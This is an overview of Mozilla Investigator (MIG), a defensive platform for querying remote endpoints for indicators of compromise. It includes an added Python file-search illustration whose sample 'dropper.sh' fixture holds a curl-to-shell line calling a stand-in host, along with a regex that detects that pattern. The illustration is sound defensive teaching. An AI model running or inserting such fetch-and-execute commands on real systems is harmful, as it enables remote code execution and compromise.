Mozilla Investigator (MIG) is a platform for performing investigative surgery on remote endpoints. It enables an investigator to obtain information from a large number of systems in parallel, which accelerates day-to-day incident investigation and security operations. MIG is composed of agents installed on all the systems of an infrastructure; the agents are queried in real time to investigate the network state, memory, file system or configuration of the endpoints. The real-time queries go through a messaging protocol implemented by the MIG scheduler. MIG also has a database, an API, a console client and RabbitMQ relays.
MIG allows an investigator to send actions to a pool of agents to check for indicators of compromise, verify configuration state, create a firewall rule, update a blacklist, block an account and so on. Agents are designed to be secure, easy to deploy and lightweight. All parameters are built into the agent at compile time, including the list of investigator public keys. The agent binary is compiled for the target platform and shipped without external dependencies.
Targeted searches run on millions of endpoints in a short time. The architecture of Mozilla Investigator is cross-platform and modular. MIG is written entirely in Go, and the agent runs on Linux, Windows and macOS. Capabilities are added through modules that are shipped and compiled with the agent. Using Go simplifies the MIG architecture and helps build a security tool with a minimal memory and CPU footprint.
Concepts of MIG:
- Easy to operate and deploy: The MIG agent is designed to be secure, lightweight and easy to deploy, so you can ask your favorite sysadmins to add it to the base deployment without fear of breaking the production system. All parameters are built into the agent at compile time, including the list of authorized investigators and their ACLs. Security is enforced with PGP keys: if the MIG server is compromised but your key is safe on the investigator's laptop, no one can break into the agents.
- Asynchronous and fast: MIG is designed to be asynchronous and fast. It uses AMQP to distribute actions to the endpoints and relies on channels to prevent any component from blocking. Running actions and commands are stored in a disk cache and do not rely on a running process for reliability. Speed is a strong requirement: most actions take a few hundred milliseconds to run. For example, looking for a hash in a large directory must run in less than two minutes.
- Strong security primitives: Security and privacy are a statement. Agents never send raw data back to the platform; they reply to questions instead. All actions are signed with GPG keys that are not stored on the platform, which prevents a compromise of the platform from spreading to the entire infrastructure.
Goals of MIG:
- Query a pool of endpoints to verify the presence of specific indicators (similar to IOCs, but in a different format).
- Provide a response mechanism to lock down compromised endpoints.
- Periodically verify endpoint compliance with security requirements.
Features of MIG:
- MIG provides strong authentication of investigators. An action must have a valid GPG signature, and each investigator has a separate key for traceability.
- It provides a way of inspecting remote systems for IOCs (indicators of compromise). At the moment this is limited to files by name, file content by regex, connections to an IP, and file hashes (md5, sha1, sha256, sha384, sha512, sha3-224, sha3-256, sha3-384 and sha3-512).
- It protects data privacy and investigates without intruding: raw data is not readily available to the investigator.
- Agent modules work at a low level (file system blocks, memory, network cards), as network sniffers, with firewall rules (read and write), and with account creation and destruction.
- MIG provides response mechanisms including system password changes, dynamic firewall rule addition and removal, and process execution and destruction (execve and kill).
- Input and output of IOCs and YARA rules through an API.
- Output results in a standard alert format.
- Investigation console.
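As an added illustration of the IOC file checks and the "reply to questions, not raw data" rule described above (example code, not MIG's own file module), the following Python search answers name-regex, content-regex and sha256 questions about a constructed sample tree and returns only matching paths and a count, never file contents:

```python
import hashlib
import os
import re
import tempfile

def file_search(root, names=(), contents=(), sha256=()):
    """Hypothetical agent-side check modelled on MIG's file module (not MIG code).
    Matches files under root by name regex, content regex or sha256 and, like MIG,
    answers only with matching paths and a count, never with file contents."""
    name_res = [re.compile(p) for p in names]
    content_res = [re.compile(p.encode()) for p in contents]
    wanted = {h.lower() for h in sha256}
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            matched = any(r.search(fn) for r in name_res)
            if not matched and (wanted or content_res):
                with open(full, "rb") as f:
                    data = f.read()  # inspected locally, never sent back
                matched = (hashlib.sha256(data).hexdigest() in wanted
                           or any(r.search(data) for r in content_res))
            if matched:
                hits.append(os.path.relpath(full, root))
    return {"count": len(hits), "paths": sorted(hits)}

# Constructed sample tree (made-up contents, not real indicators).
SAMPLES = {
    "etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "tmp/dropper.sh": b"#!/bin/sh\ncurl http://example.invalid/x | sh\n",
    "home/user/notes.txt": b"nothing to see here\n",
}

def build_sample_tree():
    root = tempfile.mkdtemp(prefix="mig_demo_")
    for rel, data in SAMPLES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root

def demo():
    """Ask three questions at once: a file name, a content regex and a known-bad hash."""
    known_bad = hashlib.sha256(SAMPLES["tmp/dropper.sh"]).hexdigest()
    return file_search(build_sample_tree(), names=[r"^passwd$"],
                       contents=[r"curl .*\| ?sh"], sha256=[known_bad])
```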
All documentation is available in the doc directory and on http://mig.mozilla.org. There are two types of documentation: concepts & internal components, and installation & configuration.
- Internal components and concepts: Essential documentation for understanding the MIG architecture and the role of its various parts.
- Configuration guide: Step-by-step guides to deploying a MIG platform, from the agent to the database. The following documentation is also provided:
- Client: A client is the interface an investigator uses on a local machine to interact with MIG. It includes the MIG command line, the MIG console and the MIG runner.
- Modules documentation: Module documentation covers file, memory, package, netstat, scribe, ping and timedrift.
- Workers documentation: Covers the agent intel worker, which publishes endpoint details to MozDef.
- Developer's documentation: Covers the agent architecture, writing modules, writing persistent modules and the API endpoints.
- Database documentation: MIG stores its data in PostgreSQL. This page explains the database structure and gives some example queries.
Testing process of MIG:
Assume you have a dedicated Ubuntu system, such as a VM. You can use the standalone installation script to rapidly deploy a test environment.
$ sudo apt-get install golang git
# must be >= 1.5
$ go version
go version go1.6.1 linux/amd64
$ export GOPATH=$HOME/go
$ mkdir $GOPATH
$ go get mig.ninja/mig
$ cd $GOPATH/src/mig.ninja/mig
$ bash tools/standalone_install.sh
The script above installs all the components MIG needs for a localhost-only installation. Follow the instructions printed at the end of the script to convert it into real infrastructure, or read the installation and configuration documentation.